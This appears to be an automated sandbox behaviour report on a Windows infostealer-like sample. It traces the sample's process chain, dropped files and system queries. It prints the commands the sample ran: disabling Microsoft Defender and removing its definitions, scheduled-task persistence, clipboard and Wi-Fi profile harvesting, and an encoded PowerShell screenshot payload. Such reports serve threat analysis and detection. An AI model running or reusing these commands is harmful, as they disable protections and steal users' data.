Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_00427BFF GetLastError,FormatMessageW,

5_2_00427BFF

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_0043C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

5_2_0043C652

Source: C:\ProgramData\setup.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Source: C:\ProgramData\main.exe

File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\ProgramData\main.exe	Mutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Windows\Logs\SettingSync\cmd.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\ProgramData\Microsoft\based.exe	Mutant created: \Sessions\1\BaseNamedObjects\9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_03

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI73082

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Command line argument: sfxname	5_2_0044037C
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Command line argument: sfxstime	5_2_0044037C
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Command line argument: pPF	5_2_0044037C
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Command line argument: STARTDLG	5_2_0044037C
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Command line argument: >GE	5_2_00454690

Source: iqA8j9yGcd.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7716
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: based.exe, 00000008.00000003.2777793095.000001F16D036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: iqA8j9yGcd.exe

ReversingLabs: Detection: 50%

Source: based.exe	String found in binary or memory: id-cmc-addExtensions
Source: based.exe	String found in binary or memory: set-addPolicy
Source: based.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
Source: based.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
Source: based.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

File read: C:\Users\user\Desktop\iqA8j9yGcd.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iqA8j9yGcd.exe "C:\Users\user\Desktop\iqA8j9yGcd.exe"
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Users\user\Desktop\iqA8j9yGcd.exe "C:\Users\user\Desktop\iqA8j9yGcd.exe"
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB2CE.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
